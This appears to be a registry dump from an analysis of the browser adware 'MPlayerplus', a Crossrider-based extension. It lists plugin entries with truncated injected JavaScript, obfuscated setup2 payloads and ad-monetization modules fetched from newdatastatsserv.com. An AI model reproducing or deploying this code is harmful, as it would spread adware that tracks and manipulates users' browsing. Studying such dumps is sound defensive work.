[HKCU\Software\MPlayerplus_01\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:)
[HKCU\Software\MPlayerplus_01\Plugins\46]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"JavaScript" = "var _0x4cfc=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""
[HKCU\Software\MPlayerplus_01\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\MPlayerplus_01\Plugins\192]
"Name" = "revizer_ws_dynamic_b2b_m"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/3.js"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\MPlayerplus_01\Manifest]
"BgVersion" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO4)"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"URL" = "http://js.newdatastatsserv.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.sej)"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appAR)"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/7.js"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/37.js"
[HKCU\Software\MPlayerplus_01\Plugins\180]
"Version" = "12"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/94.js"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\MPlayerplus_01\Plugins\233]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/233.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"URL" = "http://js.newdatastatsserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"Version" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\289]
"Version" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\MPlayerplus_01\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\MPlayerplus_01\Plugins\41]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKCU\Software\MPlayerplus_01\Plugins\230]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/230.js"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"Version" = "10"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"Name" = "setup"
[HKCU\Software\MPlayerplus_01\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjEz)"
[HKCU\Software\MPlayerplus_01\Manifest]
"RunInFrame" = "false"
[HKCU\Software\MPlayerplus_01\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,93,102,104,180,184,192,220,195,211,221,223,230,233,242,244,253,260,262,263,273,275,281,286,289,91"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\MPlayerplus_01\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n1)"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU3OTQzNDk1MTVhNDExODAyMTkwNTI2MTEwNTUzNDA0MzUyMWUxOTAxMDM1OTQ2NWUxMzRkMTMwNDA5MDcxNzEzMDMwMjU0MGExZTEwMDI1YTEwMTEwZDAzNTUwOTExMDAwYzA2MTAxMTAwMDEwZTRkMWEwNTUyMTYxYjAyMDcxZjFmMGY0ZDE1MWYxMTAxM2MzNjJlMzkzMTNmMjUzZTI3M2EyNzJjMjMyNTI2MjgyMjI4M2IzNzI2MmQyZTI5MzYzMjI5MjQzMTJjM2M0ZjEwMGExMzI0MWYxOTE5MTY1ZTM2MmUzOTMxM2YyNTNlMjczYTI3MmMyMzI1MjIyMDI2MzIzYjMyMmUyYzJlMjU0NTE4MWYwOTQ4MmMzYzJhMjMzNTMwMjMyNDI0MzEzNjMxMzYyNDI5MjYyMjI5MjQzMTJjM2M0YjVkNzA0MzUwNTY0ZDU3MWIxNzFkMDEwOTM2MDIxYTRmNGY1MzQxMDEwNTBlMTMwMzRjNDI1YTFhM2MwYTAzMWUxMTE0MDYwNzA2MmMwYTA3MTcxNTRkMDQxYTFlMTYxNzBkNDcxMjE1MGU1ZjE1MWYxMTAxNGMwMzEwMGMwMjAzMTUxZjFjMDMxNzQ3MWIwOTVjMTMxZTBjMWIxZDA2MDU0YzE5MTExNDA0MzIyYTJjMjAzYjNlMjkzMDIyM2YyOTMwMjEzYzJjMjkyZTI2M2UzMjI4MzEyYzMwM2MzMzI1MmEzNDI5MzI1MzEyMTMxOTI1MTMxNzFjMTM1MDJhMmMyMDNiM2UyOTMwMjIzZjI5MzAyMTNjMjgyMTJhM2MzZTM3MjAzMDJjM2M0ZjE5MTMwNzRkMjkzMjM2MjEyYzNhMjIyODJhMzQzMzNmMmEyNjMwMmMyMzI1MmEzNDI5MzI1NzVmNDM0OTUxNWE2OTUwNTY0ZDU1NTExMzA1MDQxZDBhMWUzZjA5NTc0OTQzNTg0MTQ4Njkw)"
[HKCU\Software\MPlayerplus_01\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { //alert(appAPI.isMatchPages(*youtube*)); //alert(appAPI.isMatchPages(*watch*)); //alert(appAPI.isMatchPages(*hd=1*)) if (appAPI.isMatchPages(*youtube*) && appAPI.isMatchPages(*watch*) && !appAPI.isMatchPages(*hd=1*)) { //alert(window.location); window.location = window.location &hd=1"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI2NDRmNGU1MDQ4NTQxZTEwMWUwMDNiMWQwMjUyNTI1NjU0MGMxZTA0MWU1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjAwMDIwMjE0MTkyNTFjMDM0YzRhNDg1NDFlMTAxZTAwMWQ1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjE4MWEwMzAzMDMxZTI3MGI0YzRhNDg0NzQ2NTA2MDBk', 'pnonphvvdj'); }"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3OTYzNDQwMDBkMDQwNDM3MDYwNjUxNTA0NjRhMjYyZjM3MzAyYjM5MjcyYjMyMjEzYTJmM2MyZDI3M2UyYzM1NDkxYjE4MWUxZDE2MGQ0NTExMDMzOTE4MTAwODExMGU1YTAwMDA0ODRhNjI3MDUyMDQwZTAxMGQxYTA0MmYwYzViNGE1NDUwNDE1OTVmNjA2ZjRhMTAxZTE4MGIxYTBmMzkzOTQ0NTI1OTUyMDMwYjFhMGUxYzFkNDgzNzI2MTIxZDNkMDQwMzBiMGYwYTM3MGMwMjE4M2QyYjRhNGU0YTQxMzcyNjMzMjYzZDI3M2UzMjNlMzUzNzMxM2YyNzM2MmIzNTVjMDgwZjQ2MWUxOTEyNWQxNzBiMWUxYTA3MDExZTFlNDkzZDJiMjkyMTI1MzUzYjJiMzkzMDI3MjYzNTMwMmIyYjM4MjYzOTMwM2QyYjRjMTExODA5MWYwYTE1MDY1ZjJiMzUzMDM4MjkzYjJhMjIzZDI2MzEzODJjMjgzNDI3MmUyMzMxMzAyYjM1NTUwODBmMGI0NDJmMmIyMTI2MjUyMDM5MzQyMTNkMzUyNjNkMjEzOTM2MzgzOTIxM2QyZjJiNDQwNjA0MTc1NzQxNDg1MjUwNWMwYzExMWQ1MzJlMDcxYzFjNTg1ZDRiNWEwZDE2MWUzMjAxMTQxNTVjNGI0ZjQ4NzkxNw==', 'jsjfhyptbt'); }"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\MPlayerplus_01\Plugins\47]
"Version" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\MPlayerplus_01\Plugins\223]
"Version" = "8"
[HKCU\Software\MPlayerplus_01\Plugins\260]
"Name" = "pricedetect_sidebar_m"
[HKCU\Software\MPlayerplus_01\Plugins\269]
"Name" = "stats_ie"
[HKCU\Software\MPlayerplus_01\Debug]
"IsDebuggingPlugins" = "0"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2ZTY4NTUwYzFhMTkxYTI1MTQwNjQ2NWI1NzQ2MDYxOTFlMDA1YzQ1NGIxNjAwMTM0MDFlMWYwMDAzMTgwMjA4MDQwYzQwMGUwNTFkNDkxZDE3NGUwNDAyMzEwMDBiMTkwODQ0MGUxMjA3NWIwYTAxMTkxZjEzMTgwNzA0NGEwYzA2MWIxMDFkMGYwMTEzNDcwMjE3MGIxZjIzMTQ1YjBiMDYwMjUxMjczYTI0MmU0ZDM5MzUyNzMzMzgzNzNkM2YyMzM0MjMzODNiMjQyZjMwMmIyMzJlMzUyMjM1MzczNDM1M2IyNzI5MzUyZjQwMWEwNTEzMDMwYTBiMWYwNDExMGIwZjU5M2UyODI3M2MyMjM5MjMzNDIzMjAyNDI1M2IyZjNkM2EyZjI4MmIyOTI0MjgzYjRjNDE2MDc5NDQwMjEwMTUwNzE3M2IxZjA2NTI1YzRhNDYwOTAzMTAxZTFlNTA1ZjQ5MWQxMzE2NTkxNzFiMWQwZjAyMDAwMzE3MDk1OTA3MDEwMDQ1MDcxNTQ1MTcwNzI4MDkwZjA0MDQ1ZTBjMTkxNDVlMTMwODFkMDIxZjAyMDUwZjU5MDkxZjEyMTQwMDAzMWIxMTRjMTExMjEyMTYyNzA5NTcxMTA0MDk0MjIyMjMyZDJhNTAzNTJmMjUzODJiMzIyNDM2MjcyOTJmMjIzOTJmM2MzNTMyMmEyYTI4MmUyZjM1M2YyNjNlM2UyMDMxMzI0YzAwMDcxODEwMGYxMjE2MDAwYzA3MTU1YjM1M2IyMjI1MmIzZDNlMzgzOTIyMmYzNjNlMzYzNDNlMzIyNDMxMmIyZjNiM2U1NTQ4NjQ2NDQ4MDAwYTFmMDMwODE5MmQwYTRmNTA1MDVmNTk2ZTFj', 'jdawdnmjpf'); }"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/102.js"
[HKCU\Software\MPlayerplus_01\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2NjY1NWExMjBjMTUxZTJkMTgxYTRlNTY1ODU4MTAxNTFhMDg1MDU5NDMwZjFjMTQ1NjE3MDcwYjBiMTIwODQyMWIxNTE1NGUxZDFiMTgxZjFjMTg1NzRiNGM1NDU4NGY1ZDQ0NTk1YjRlNGY1NzExMWMxZDA2MTkwZDA4NTYxMDBiNWUxZDBkMDgxZjA4NTEyNzI1M2IzMzIxMmIzOTI0MjUyODNkMjgyNzI0MzYyYzJmMzgyODI5M2MyNTJiMzQyYzI3MjMzMjMzMzM1ZTBmMTU1YzMxMjcyOTI0MjMzZjJiMjgzMTI1MmIyYTM1MzczYzNjMjczNDM5MmMyYjI3MzU1NDQwNjY3MTU4MTAxNTFhMDgxOTIzMWUwMDVhNDA1ODQzMDYwYzFlMDYxZjU2NTc1NTFiMDUwMDU2MWMxZjFmMGQxYzFlNTYwMjAxMTU0NTA1MGYxZTExMGEwYzRlNWY0YzVmNDA1YjViNGE0ZjRmNTc1YjU3MWEwNDA5MDAxNzFiMWM0ZjA0MGI1NTA1MTkwZTExMWU0NTNlMzEzYjM4MzkzZjNmMmEzMzNjMjQzYzI3MmYyZTM4MjkzNjNlM2QyNTMxMmIzZjM0MzMyNTNjMjUyNzQ3MWIxNTU3MjkzMzJmMmEzNTJiMzIzYzMxMmUzMzNlMzMzOTJhMjgzZTIwMzkyNzMzMzMzMzVhNTY3MjY4NGMwODA2MDMwYjA1MTYzMzFjNDM1NDU4NTg0NDVmNjYwNQ==', 'vllxzxanxj'); }"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/195.js"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"Version" = "13"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"Version" = "85"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/14.js"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\MPlayerplus_01\Plugins\286]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTY3MjRjNTQ0MjUxNTcxYjE2MTYxZDJkMWUxODQwNGI1NTUxMGExNjE5MDg1NjViNGQxODE2MWU0YzEwNDMwZjAzMDYwZTE1MDYwMDBlNGMwMzFkMTg1YjExMDE1YTEyNGMwODFlNDcwZjE1MGYwMTE0MWEwNTBjMjQxYzUxMmIzZDMyMjczYzMxMzEzZjMxMjgzMTMwMmUzNjMyMmYzMjMyMzEyODJiM2Q1NzE2MWMxNzBjMTkwYTE1MzcwZDE1MTA0ZTNkM2QyZTJhMjMyNzMxMjMzYzM3MjczMDMyM2IyMzIxMmMyNTI3MmEzZDIxMjIzYzI5MmIzZDU3MTQwMzEyMmMwYzE1MDk0OTNkMmUzNjIxMmQzMTNlMmEyNTMwMjcyMzJhMzIzMjMyMzIzNjJkMzkyNzJlMmE1MTRlNjg0ZDU4NGM1NDQwMTkwMTA3MTIxMTM4MGEwMDU2NTg1MTU3MWIxNjE2MWQwYjU2NWI0ZDE4MTYxZTRjMTA0MzBmMDMwNjBlMTUwNjAwMGU0YzAzMWQxODViMTEwMTVhMTI0YzA4MWU0NzBmMTUwZjAxMTQxYTA1MGMyNDFjNTEyYjNkMzIyNzNjMzEzMTNmMzEyODMxMzAyZTM2MzIyZjMyMzIzMTI4MmIzZDU3MTYxYzE3MGMxOTBhMTUzNzBkMTUxMDRlM2QzZDJlMmEyMzI3MzEyMzNjMzcyNzMwMzIzYjIzMjEyYzI1MjcyYTNkMjEyMjNjMjkyYjNkNTcxNDAzMTIyYzBjMTUwOTQ5M2QyZTM2MjEyZDMxM2UyYTI1MzAyNzIzMmEzMjMyMzIzMjM2MmQzOTI3MmUyYTUxNGU2ODRkNTg0YzU0NDAwMTE5MDYwNTBiMDMzMTA4NTY1ODUxNDc0YjU0NjgxMA==', 'mxltbqusbb'); }"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/36.js"
[HKCU\Software\MPlayerplus_01\Plugins\262]
"Name" = "pops_5_j_m"
[HKCU\Software\MPlayerplus_01\Plugins\230]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Plugins\40]
